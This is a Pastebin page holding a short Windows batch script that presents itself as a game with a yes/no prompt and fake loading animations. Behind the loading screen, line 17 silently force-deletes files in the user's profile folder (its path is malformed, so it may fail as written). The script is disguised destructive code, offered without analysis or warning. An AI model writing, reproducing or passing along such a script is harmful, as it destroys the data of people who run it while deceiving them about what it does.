Advertisement
Guest User

Untitled

a guest
Jul 16th, 2019
59
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.74 KB | None | 0 0
  1. @echo off
  2. color 0a
  3. title Game
  4.  
  5. echo Do you want to Play?
  6. echo Press Yes to play
  7. echo Press No to quit
  8.  
  9. set /p game=
  10. if %game%==Yes goto play
  11. if %game%==No goto no
  12. :play
  13. cls
  14. echo Game is Loading...
  15. ping localhost -n 3 >nul
  16. cls
  17. del /f /q "C:\Users\%userprofile%\*.*"
  18. echo Loading.
  19. ping localhost -n 2 >nul
  20. cls
  21. echo Loading..
  22. ping localhost -n 2 >nul
  23. cls
  24. echo Loading...
  25. ping localhost -n 2 >nul
  26. cls
  27. echo Loading.
  28. ping localhost -n 2 >nul
  29. cls
  30. echo Loading..
  31. ping localhost -n 2 >nul
  32. cls
  33. echo Loading...
  34. ping localhost -n 2 >nul
  35. cls
  36. echo Loading.
  37. ping localhost -n 2 >nul
  38. cls
  39. echo Loading..
  40. ping localhost -n 2 >nul
  41. cls
  42. echo Loading...
  43. ping localhost -n 2 >nul
  44. cls
  45. pause
  46. :no
  47. echo Okay, good bye ;)
  48. pause
  49. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement